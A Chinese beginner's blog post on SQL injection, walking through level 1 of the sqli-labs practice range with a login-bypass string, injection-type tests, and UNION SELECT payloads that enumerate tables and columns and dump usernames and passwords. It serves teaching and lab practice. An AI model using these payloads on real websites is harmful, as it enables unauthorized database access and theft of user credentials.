初识sql注入

原创 已于 2024-11-01 20:56:34 修改 · 1.3k 阅读 · 22 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#sql #数据库 #oracle
于 2024-10-31 22:06:07 首次发布

所谓sql注入,就是将SQL代码插入或添加到用户输入的字段(比如网站的表单输入框)中,以此使得数据库执行非预期的命令。

例如,一个简单的登录验证场景命令,正常的 SQL 语句可能是这样的:

SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';

如果攻击者在用户名输入框中输入 ' OR 1=1 -- (这里假设应用程序没有对输入进行处理),那么实际执行的 SQL 语句就会变成:  

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'input_password';

其中,是 SQL 中的注释符,后面的内容会被数据库忽略。这样一来,由于 OR 1=1 这个条件恒成立,就可能导致绕过登录验证,直接获取到用户表中的所有信息。

听起来很帅吧,但以后一定谨慎,而且这玩意真的超级难懂,像是外星人的语言,需要我们学,一直学!

我以sqli-labs靶场第一关为例子讲解一些注入流程(包含一些语句)。

打开第一关

b33550a68a214d28b632c260549490f2.png

首先判断是否存在注入以及注入类型

如何判断页面是否存在sql注入,可以尝试闭合看有没有报错,如果报错,说明可以进行sql注入。(id后面加单引号,返回正常,不存在;返回不正常,存在)

注入类型判断:

假设ip/?id=1

如果是数字型,参数没有被引号包围:
id=1 and 1=1 返回页面正常
id=1 and 1=2 返回页面不正常
id=1’ and ‘1’=‘1 返回页面不正常
id=1’ and ‘1’=‘2 返回页面不正常
字符型,参数被引号包围:
id=1 and 1=1 返回页面正常或错误
id=1 and 1=2 返回页面正常或错误
id=1’ and ‘1’=‘1 返回页面正常
id=1’ and ‘1’='2 返回页面不正常

看到黄色字体,需要输入id,先试着输入 ?id=1(问号相当于告诉电脑要传入参数)

9a32d1d1699147559048ffb30ff3b36d.png

可以看到登录账号和密码。这里可以进行sql注入

下一步就开始进行注入。

看看数据库有多少列,使用以下语句:

?id=1' order by 3--+

?id=1' union select 1,2,3 --+

这两句都可以

补充:union select:将多个SELECT语句的结果合并到一个结果集中,用于联合注入(大概以后会讲,或者看其他人的博客,这里不再多讲)。

f4c09d0688dc46fe9d1fa9523d9466f9.png

b481c7124d6146a3bdd3eff99eb9c54d.png

可以发现有3列

判断name和password属于数据库中第几列

?id=-1' union select 1,2,3 --+

4c1c83b1e24644959d3fe0301366d9ca.png

可以看到name在第2列,password在第3列

下一步在第2或第3列查询数据库名称,语句如下:

?id=-1' union select 1,database(),3 --+

9acf57d0c80540c6b2c31123d7ec0266.png

然后分别利用如下语句查询数据库中所有的表和所有的列

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),3--+  表

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users'),3 --+  列

37f99c78b8bc4b5881bbb24d8378bfa5.png

a2feed7d04cf4c55a1327b9690f9e6b8.png

现在就差查数据了,语句走起

?id=-1' union select 1,group_concat(concat_ws(0x3a,username,password)),3 from security.users --+

f78aeaa87a79432f9cb738d23c2ad443.png

到这里,数据库名,数据库中的表名,列名,数据就都知道了。

那么第一关就大功告成!其实后面第二关到第四关大多类似,关键在于判断sql注入类型。

最后提醒:一定要在前面打问号!!!空格,大小写要把控好!sql注入语句比较难记,需要多加巩固实践!

今天就到这里喽!

killer Curry
关注
利用SQL注入漏洞登录后台
zxcvbnmasdflzl的博客
06-19 1万+
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
综合案例(账号密码登录和SQL注入
IT深耕十余载,大道之简
05-02 2250
在后台,我们使用SQL查询语句来验证用户输入的用户名和密码是否与数据库中存储的相匹配。然而,如果我们在编写上述SQL查询语句时没有对用户输入进行适当的过滤或转义,就可能会面临SQL注入的风险。攻击者可以在用户名或密码的输入框中输入一些特殊字符,从而改变SQL查询语句的语义,达到绕过登录验证或窃取数据的目的。当用户输入用户名和密码后,后台会执行一条SQL查询语句来验证输入的用户名和密码是否与数据库中存储的相匹配。始终为真,所以这个查询语句会返回数据库中所有的用户数据,从而绕过了登录验证。
我的基础SQL注入学习(1)登陆注入
最新发布
2502_93241793的博客
03-31 455
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。而仔细观察网址,我们不难发现网站链接有date结尾的参数,这是一个典型的动态网页参数传递形式,在真实挖掘漏洞的场景中,我们可以以此为切入点,尝试查看是否存在SQL注入点!一般我们登录的时候,会输入用户名以及密码。的输入进你想要的框,请求就会发送至SQL数据库并转化为SQL语句(就是前面讲的SELECT语句),并进行前面所说的一系列过程。
sql注入详解
m0_67392811的博客
06-12 7007
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 2355
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
登录页面的SQL注入漏洞
m0_61974571的博客
10-12 4348
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入类攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
初识SQL注入
qq_68163788的博客
01-24 2562
SQL注入是一种常见的网络安全攻击方式,通过在应用程序的输入框中注入恶意的SQL代码,从而利用数据库系统的漏洞来执行恶意操作。攻击者可以利用SQL注入来绕过认证、访问未授权的数据、修改数据或者破坏数据库SQL注入通常发生在需要用户输入数据的地方,比如登录表单、搜索框、评论框等。攻击者可以在输入框中输入恶意的SQL代码,当应用程序没有对输入进行充分的验证和过滤时,这些恶意代码就会被执行,从而导致安全漏洞。 为了防止SQL注入攻击,开发人员应该使用参数化查询或者预编译语句来处理用户输入
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 14万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
SQL注入原理讲解
幻染雨停轻的博客
09-16 2万+
本文转自http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。      网络安全成为了现在互联网的焦...
利用SQLmap实现 SQL 注入
weixin_70934757的博客
06-29 1040
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。
sql注入实战
qq_64875725的博客
04-17 314
sql注入的原理是吧用户输入的数据都当做代码来执行,最终达到将欺骗服务器的恶意指令输入数据库中。首先,寻找注入点,常见的注入点用户的登陆界面,搜索框等。id = 1' and '1' = '2 返回失败。id = 1' and '1' ='1 返回成功。id = 100 and 1=1 返回正常。id = 100 and 1=1 返回成功。id = 100 and 1=2 返回失败。ID=100’ 返回错误说明可能存在注入。id =100 and 1=2 返回错误。满足以上三点,说明存在注入点。
SQL注入(一)
2401_84971057的博客
05-13 1484
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DC-1 登录框sql注入
a_153161的博客
12-04 1417
DC-1登录框的报错注入
SQL注入方法登录成功
h0ck1r的博客
03-18 1489
认识SQL注入以及一个简单的示例
干货 | 这套网站漏洞挖掘(渗透)思路,看完能快速上手
ytt0523_com的博客
02-28 1034
本篇主要分享网站各漏洞思路,希望你看完有所收获。
SQL注入
flylr^的博客
08-12 1483
Sql注入指的是web程序对用户输入的过滤不足,致使非法数据入侵系统;sql注入是一种常见的数据库攻击手段,sql注入漏洞也是网络世界中最普遍的漏洞之一。
如何用SQL注入攻击登陆界面
Rainman的专栏
06-15 2万+
适用范围: 1. 如果一个系统是通过SELECT * FROM accounts WHERE username=admin and password = password这种显式的SQL来进行登陆校验,也就是执行这个SQL语句,如果数据库中存在用户名为admin, password为password的用户,就登陆成功,否则就登陆失败。2. 系统没有对用户输入进行全面
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值